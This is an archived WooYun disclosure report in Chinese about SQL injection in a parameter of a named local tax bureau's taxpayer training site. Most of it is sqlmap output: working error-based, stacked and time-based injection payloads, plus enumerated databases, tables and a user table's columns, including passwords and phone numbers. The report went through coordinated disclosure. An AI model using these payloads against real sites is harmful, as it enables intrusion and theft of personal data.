乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-04-29: 细节已通知厂商并且等待厂商处理中 2015-05-04: 厂商已经确认,细节仅向厂商公开 2015-05-14: 细节向核心白帽子及相关领域专家公开 2015-05-24: 细节向普通白帽子公开 2015-06-03: 细节向实习白帽子公开 2015-06-18: 细节向公众公开
存在于什么纳税人之家还有纳税人网校
http://ws.bzsqgs.com/YC_xwList.aspx?fl=1 (GET)fl参数存在SQL注射
sqlmap identified the following injection points with a total of 61 HTTP(s) requests:---Parameter: fl (GET) Type: error-based Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause Payload: fl=1' AND 4372=CONVERT(INT,(SELECT CHAR(113)+CHAR(107)+CHAR(120)+CHAR(120)+CHAR(113)+(SELECT (CASE WHEN (4372=4372) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(120)+CHAR(122)+CHAR(120)+CHAR(113))) AND 'bCqq'='bCqq Type: stacked queries Title: Microsoft SQL Server/Sybase stacked queries Payload: fl=1'; WAITFOR DELAY '0:0:5'-- Type: AND/OR time-based blind Title: Microsoft SQL Server/Sybase time-based blind Payload: fl=1' WAITFOR DELAY '0:0:5'-----web server operating system: Windows 2003 or XPweb application technology: ASP.NET, ASP.NET 4.0.30319, Microsoft IIS 6.0back-end DBMS: Microsoft SQL Server 2005sqlmap identified the following injection points with a total of 0 HTTP(s) requests:---Parameter: fl (GET) Type: error-based Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause Payload: fl=1' AND 4372=CONVERT(INT,(SELECT CHAR(113)+CHAR(107)+CHAR(120)+CHAR(120)+CHAR(113)+(SELECT (CASE WHEN (4372=4372) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(120)+CHAR(122)+CHAR(120)+CHAR(113))) AND 'bCqq'='bCqq Type: stacked queries Title: Microsoft SQL Server/Sybase stacked queries Payload: fl=1'; WAITFOR DELAY '0:0:5'-- Type: AND/OR time-based blind Title: Microsoft SQL Server/Sybase time-based blind Payload: fl=1' WAITFOR DELAY '0:0:5'-----web server operating system: Windows 2003 or XPweb application technology: ASP.NET, ASP.NET 4.0.30319, Microsoft IIS 6.0back-end DBMS: Microsoft SQL Server 2005available databases [5]:[*] master[*] model[*] msdb[*] tempdb[*] YC_GuoShuiJu
跑了一个库
back-end DBMS: Microsoft SQL Server 2005Database: YC_GuoShuiJu[42 tables]+----------------------+| WX_Tixing || WX_hangye || WX_info || WX_kaoshi || WX_kecheng || WX_ksResult || WX_lanmu || WX_lwkc || WX_pxkc || WX_sheying || WX_shoucang || WX_shouke || WX_shouke_r_xuesheng || WX_tiku || WX_tongzhi || WX_xianqu || WX_xuanxiang || WX_xuesheng || WX_yijian || YC_bmzhanghao || YC_bumen || YC_daan || YC_huifu || YC_lanmu || YC_liuyan || YC_lyfenlei || YC_mingan || YC_quanxian || YC_users || YC_xiazai || YC_xinxi || YC_xqfenlei || YC_xuqiu || YC_xzfenlei || YC_yonghu || YC_zbsj || YC_zhiban || YC_zhuanjia || YC_zjliuyan || htlm || jubao || jubaohuifu |+----------------------+Database: YC_GuoShuiJu+--------------------------+---------+| Table | Entries |+--------------------------+---------+| dbo.YC_daan | 346 || dbo.YC_xinxi | 248 || dbo.WX_shouke_r_xuesheng | 148 || dbo.WX_xuesheng | 129 || dbo.YC_zhiban | 123 || dbo.YC_huifu | 82 || dbo.YC_liuyan | 66 || dbo.WX_info | 43 || dbo.htlm | 36 || dbo.YC_xqfenlei | 29 || dbo.YC_zhuanjia | 28 || dbo.WX_xuanxiang | 16 || dbo.WX_hangye | 14 || dbo.WX_lanmu | 12 || dbo.WX_Tixing | 11 || dbo.WX_xianqu | 10 || dbo.WX_tiku | 9 || dbo.jubao | 7 || dbo.WX_kecheng | 7 || dbo.YC_lanmu | 7 || dbo.YC_lyfenlei | 7 || dbo.YC_quanxian | 7 || dbo.WX_shoucang | 5 || dbo.WX_shouke | 5 || dbo.YC_xuqiu | 4 || dbo.YC_bumen | 3 || dbo.YC_mingan | 3 || dbo.YC_yonghu | 3 || dbo.jubaohuifu | 2 || dbo.YC_xiazai | 2 || dbo.YC_zbsj | 2 || dbo.YC_users | 1 || dbo.YC_xzfenlei | 1 |+--------------------------+---------+sqlmap identified the following injection points with a total of 0 HTTP(s) requests:---Parameter: fl (GET) Type: error-based Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause Payload: fl=1' AND 4372=CONVERT(INT,(SELECT CHAR(113)+CHAR(107)+CHAR(120)+CHAR(120)+CHAR(113)+(SELECT (CASE WHEN (4372=4372) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(120)+CHAR(122)+CHAR(120)+CHAR(113))) AND 'bCqq'='bCqq Type: stacked queries Title: Microsoft SQL Server/Sybase stacked queries Payload: fl=1'; WAITFOR DELAY '0:0:5'-- Type: AND/OR time-based blind Title: Microsoft SQL Server/Sybase time-based blind Payload: fl=1' WAITFOR DELAY '0:0:5'-----web server operating system: Windows 2003 or XPweb application technology: ASP.NET, ASP.NET 4.0.30319, Microsoft IIS 6.0back-end DBMS: Microsoft SQL Server 2005Database: YC_GuoShuiJuTable: WX_xuesheng[22 columns]+-----------+----------+| Column | Type |+-----------+----------+| gsdz | varchar || gsmc | varchar || guhua | varchar || hyId | int || id | int || jifen | int || lastTime | datetime || lastTime1 | datetime || LastTime2 | datetime || mail | varchar || pwd | varchar || sjh | varchar || spKcIds | varchar || sshy | varchar || uName | varchar || xb | int || xqId | varchar || xqmc | varchar || xuehao | varchar || yzsjh | varchar || zcsj | varchar || zsxm | varchar |+-----------+----------+
有数据的
都是公司去国税局培训
危害等级:高
漏洞Rank:11
确认时间:2015-05-04 10:05
CNVD确认并复现所述漏洞情况,已经转由CNCERT下发给山东分中心,由其后续协调网站管理单位处置
暂无